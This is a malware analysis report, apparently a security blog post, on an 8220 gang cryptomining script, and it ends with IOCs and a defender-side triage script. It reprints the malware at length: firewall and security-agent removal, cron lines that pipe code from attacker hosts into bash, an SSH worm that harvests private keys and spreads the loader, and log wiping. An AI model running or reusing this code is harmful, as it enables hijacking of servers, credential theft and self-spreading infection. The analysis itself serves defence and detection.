
New 8220 Mining Gang Sample Analysis Report

Preface

I saw an IOC in the team, http://192.210.200.66:1234/xmss. Tracing it back showed it was a mining script from the 8220 mining gang, so I pulled it down for analysis.

Attribution

IP information

Field: Value
IP: 192.210.200.66
Location: Chicago, Illinois, United States
ASN: 36352
Registrar: ColoCrossing
Registered address: Brisbane, Australia
Open ports: 15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152

Reverse-resolved domains:

apacheorg.top
w.apacheorg.top
agent.apacheorg.xyz
agent.apacheorg.top
apacheorg.xyz
w.apacheorg.xyz

Malicious files involved


Mining script analysis

Since the script is what we have in hand first, let's walk through each of its functions.

Disable the firewall

setenforce 0 2>/dev/null (the argument 0 switches it off; 2>/dev/null discards stderr)

Performance tuning

  1. Raise the maximum number of open files: ulimit -n 65535

  2. Disable the firewall: ufw disable

  3. Allow the malicious network traffic through

    iptables -P INPUT ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -F
    
  4. Raise the hugepages limit to improve mining performance: echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf

  5. Disable the NMI watchdog: echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

Kill competing miner samples

netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

Set Google public DNS

if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
  echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
else
  echo "ok"
fi

Uninstall security services

Uninstall Alibaba Cloud Shield (Aegis) and the cloud monitoring agents, and block Alibaba Cloud Shield's IP ranges

if ps aux | grep -i '[a]liyun'; then
    /etc/init.d/aegis uninstall
    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    sudo pkill aliyun-service
    killall -9 aliyun-service
    sudo pkill AliYunDun
    killall -9 AliYunDun
    iptables -I INPUT -s 100.100.30.1/28 -j DROP
    iptables -I INPUT -s 140.205.201.0/28 -j DROP
    iptables -I INPUT -s 140.205.201.16/29 -j DROP
    iptables -I INPUT -s 140.205.201.32/28 -j DROP
    iptables -I INPUT -s 140.205.225.192/29 -j DROP
    iptables -I INPUT -s 140.205.225.200/30 -j DROP
    iptables -I INPUT -s 140.205.225.184/29 -j DROP
    iptables -I INPUT -s 140.205.225.183/32 -j DROP
    iptables -I INPUT -s 140.205.225.206/32 -j DROP
    iptables -I INPUT -s 140.205.225.205/32 -j DROP
    iptables -I INPUT -s 140.205.225.195/32 -j DROP
    iptables -I INPUT -s 140.205.225.204/32 -j DROP
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
    rm -rf /usr/local/cloudmonitor

Uninstall Tencent Cloud YunJing

  elif ps aux | grep -i '[y]unjing'; then
    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
    for i in ${process[@]}
    do
      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
      do
        kill -9 $A
      done
    done
    chkconfig --level 35 postfix off
    service postfix stop
    /usr/local/qcloud/stargate/admin/stop.sh
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/stop.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    rm -rf /usr/local/sa
    rm -rf /usr/local/agenttools
    rm -rf /usr/local/qcloud
    rm -f /etc/cron.d/sgagenttask

Select the download command

if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB

Scheduled download/update and execution of the script

cronlow(){
  cr=$(crontab -l | grep -q $url | wc -l)
  # Check whether crontab already contains the malicious script's download/update job
  if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
  else
    echo "cronlow skip"
  fi
}

The cron job is written to the following locations

/etc/cron.d/`whoami`
/etc/cron.d/apache
/var/spool/cron/`whoami`
/var/spool/cron/crontabs/`whoami`
/etc/cron.hourly/oanacroner1
cron(){
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
  then
    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
    crontab -r
  fi
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
  then
    echo "Cron exists"
  else
    apt-get install -y cron
    yum install -y vixie-cron crontabs
    service crond start
    chkconfig --level 35 crond on
    echo "Cron not found"
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
    mkdir -p /var/spool/cron/crontabs
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
    mkdir -p /etc/cron.hourly
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
  fi
  chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
  echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}

Harvest user information for propagation

Collects SSH ports, user lists, host lists and login credentials from the victim, attempts to log in to each host with them, and then downloads and runs the xmss mining script there

localgo() {
  echo "localgo start"
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          ((i++))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi

          #Wait 5 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
        done
      done
    done
  done
  # scangogo
  echo "local done"
}

Install the mining service

setupxmrservice(){
  echo "[*] Removing previous c3pool miner (if any)"
  if sudo -n true 2>/dev/null; then
    sudo systemctl stop c3pool_miner.service
  fi
  killall -9 xmrig

  echo "[*] Removing $HOME/c3pool directory"
  rm -rf $HOME/c3pool
  mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
  if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
    $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
    # preparing script

    echo "[*] Creating $HOME/c3pool/miner.sh script"
    mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
    chmod +x /usr/sbin/.rsyslogds.sh
    /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
    # preparing script background work and work under reboot
    if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
      echo "[*] Enabling huge pages"
      echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
      sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    fi

    if ! type systemctl >/dev/null; then

      echo "[*] Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
      /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
      echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
      echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."

    else

      echo "[*] Creating c3pool_miner systemd service"
      sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
      echo "[*] Starting c3pool_miner systemd service"
      sudo killall xmrig 2>/dev/null
      sudo systemctl daemon-reload
      sudo systemctl enable rsyslogds.service
      sudo systemctl start rsyslogds.service
      echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
    fi
  fi
}

This is where the mining program with MD5 e5c3720e14a5ea7f678e0a9835d28283 gets installed.

Overall flow of the malicious script

# Kill Alibaba Cloud Shield and Tencent YunJing
der

if [ -w /usr/sbin ]; then
    SPATH=/usr/sbin
  else
  SPATH=/tmp
fi
echo $SPATH

# Create the .rsyslogds.sh file, used later when the mining service is started
cat >/tmp/.rsyslogds.sh <<EOL
#!/bin/bash
# The v file holds an MD5, used to verify the MD5 of the .rsyslogds file
x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
# Verify the MD5
if [ "$x_md52" = "$x_md51" ]; then
  # If .rsyslogds is not running, start it
  if ! pidof .rsyslogds >/dev/null; then
    /usr/sbin/.rsyslogds
  fi
else
  # If the MD5s differ, download .rsyslogds from the remote server, kill the impostor .rsyslogds and run the real one
  $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
  pkill .rsyslogds
  /usr/sbin/.rsyslogds
fi
EOL

# Create the rsyslogds daemon service unit
cat >/tmp/rsyslogds.service <<EOL
[Unit]
Description=rsyslogdservice
[Service]
ExecStart=/usr/sbin/.rsyslogds
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL

MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"
MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`

# Check whether this path exists; if it does not, there is certainly no .rsyslogds file
if [ "$SPATH" = "/usr/sbin" ]
then
  # Same here: a local MD5 check of .rsyslogds. This looks like a mistake; it should be not-equal
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
  then
    # .rsyslogds MD5 matches: download and run .rsyslogds
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    # Start the mining service
    setupxmrservice
    # Collect SSH ports, user list, host list and key list, log in to each host and spread the mining script
    localgo
    # Set up the cron job that downloads/updates the script
    cron
  else
    # Run the mining program
    $SPATH/.rsyslogds
    # Start the service
    setupxmrservice
    # Collect SSH ports, user list, host list and key list, log in to each host and spread the mining script
    localgo
    # Set up the cron job that downloads/updates the script
    cron
  fi
else
  # Download and run the malicious program .rsyslogds
  $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
  # Set up the cron job that runs the script
  cronlow
fi

# The script checks whether .inis exists; if not, it downloads it from the remote server and runs it in the background
if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
then
  $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
  cd $SPATH
  nohup ./.inis &
else
  echo "ok"
fi

history -c
der
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history

The .inis file

#!/bin/bash
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
  SPATH=/usr/sbin
else
  SPATH=/tmp
fi
kill(){
  ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
  do
    kill -9 $procid
  done
}
while true; do
  ipurl="http://agent.apacheorg.top:1234"
  MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
  MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
  # I suspect this is also a mistake; it should be not-equal
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
    if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
      $SPATH/.rsyslogds
    else
      echo "ok"
    fi
  else
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    chattr +ai $SPATH/.rsyslogds
  fi
  kill
  sleep 1m
done
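A defender-side triage script for the persistence artefacts walked through above: the cron()/cronlow() drop points and /etc/init.d/down, the .rsyslogds/.inis payload paths, the rsyslogds.service unit file, and the .profile/rc.local hooks added by setupxmrservice(). This is an added example, not code from the analysed sample; the function name, the ROOT argument and the sample paths are assumptions, and the MD5 is the one this report gives for .rsyslogds.

```shell
#!/bin/sh
# Offline triage for the 8220 persistence artefacts described in the report.
# ROOT (default "", i.e. the live system) lets you point it at a mounted image
# or a test tree. Prints one "[8220] ..." line per finding on stdout; the exit
# status is always 0 so callers count lines rather than parse a return code.

# Cron/init loader line: "(curl ... /xmss||wget ... /xmss )|bash -sh"  (BRE)
XMSS_LOADER_RE='xmss.*|[[:space:]]*bash'
# MD5 reported on this page for the .rsyslogds XMRig build
RSYSLOGDS_MD5='e5c3720e14a5ea7f678e0a9835d28283'

scan_8220_persistence() {
  root="${1:-}"
  n=0
  # 1. Drop points written by cron(), cronlow() and the /etc/init.d/down line
  for f in "$root"/etc/cron.d/* "$root"/etc/cron.hourly/oanacroner1 \
           "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/* \
           "$root"/etc/init.d/down; do
    [ -f "$f" ] || continue
    if grep -q "$XMSS_LOADER_RE" "$f"; then
      echo "[8220] xmss loader in $f"; n=$((n+1))
    fi
    # The script runs chattr +ai on these files; lsattr shows that as i/a flags
    if command -v lsattr >/dev/null 2>&1 &&
       lsattr -d "$f" 2>/dev/null | cut -d' ' -f1 | grep -q '[ia]'; then
      echo "[8220] immutable/append-only attribute on $f"; n=$((n+1))
    fi
  done
  # 2. Dropped payloads (dotfiles in /usr/sbin or /tmp) and the fake unit file
  for f in "$root"/usr/sbin/.rsyslogds "$root"/usr/sbin/.rsyslogds.sh \
           "$root"/tmp/.rsyslogds "$root"/tmp/.rsyslogds.sh \
           "$root"/usr/sbin/.inis "$root"/tmp/.inis \
           "$root"/etc/systemd/system/rsyslogds.service; do
    [ -e "$f" ] || continue
    echo "[8220] dropped file $f"; n=$((n+1))
    # 3. Known-build hash; a mismatch only means a newer build, not a clean file
    case "$f" in */.rsyslogds)
      if command -v md5sum >/dev/null 2>&1 &&
         [ "$(md5sum "$f" | cut -d' ' -f1)" = "$RSYSLOGDS_MD5" ]; then
        echo "[8220] $f matches the known XMRig build MD5"; n=$((n+1))
      fi ;;
    esac
  done
  # 4. Relaunch hooks appended to .profile and rc.local by setupxmrservice()
  for f in "$root"/root/.profile "$root"/home/*/.profile \
           "$root"/etc/rc.d/rc.local "$root"/etc/rc.local; do
    [ -f "$f" ] || continue
    if grep -q '\.rsyslogds\.sh' "$f"; then
      echo "[8220] relaunch hook in $f"; n=$((n+1))
    fi
  done
  # Summary goes to stderr so stdout stays one line per finding
  echo "scan complete: $n finding(s)" >&2
  return 0
}

# Stand-alone use: ./scan.sh --run [ROOT]  (reading cron spools needs root)
if [ "${1:-}" = "--run" ]; then
  scan_8220_persistence "${2:-}"
fi
```

Cron files the script created are also chattr +ai, so `chattr -ia` is needed before they can be removed; rsyslogds.service must be disabled before killing the miner or systemd will restart it.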

Mining program analysis: .rsyslogds

Basic information

Field: Value
File name: .rsyslogds
MD5: e5c3720e14a5ea7f678e0a9835d28283
SHA256: 86843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692
File type: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped
File size: 2077172 bytes
Other: UPX packed

Program analysis

After UPX unpacking, opening the binary shows that it is a build of the off-the-shelf XMRig mining project, version 6.7.1, compiled on 2021/01/12.

Extracted wallet address: 48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

IOC information

MD5
e5c3720e14a5ea7f678e0a9835d28283
51cf7dde4003aa6901918e373bf91b18
01972190a83b183b56064d82045de8d6
caa9ea2c522fc6268c7e976142d48775

IP
205.185.113.151
194.156.99.30
5.196.247.12
205.185.116.78
192.210.200.66

Domain
bash.givemexyz.xyz
bash.givemexyz.in
agent.apacheorg.top

URL

Wallet address
48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF